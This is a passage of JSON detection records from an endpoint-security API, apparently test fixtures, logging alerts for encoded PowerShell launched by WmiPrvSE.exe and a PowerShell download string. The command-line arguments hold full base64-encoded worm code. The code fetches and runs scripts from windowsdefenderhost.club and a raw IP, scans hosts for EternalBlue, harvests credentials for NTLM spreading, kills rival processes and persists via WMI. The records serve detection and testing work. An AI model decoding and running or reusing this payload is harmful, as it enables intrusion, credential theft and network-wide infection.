ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAI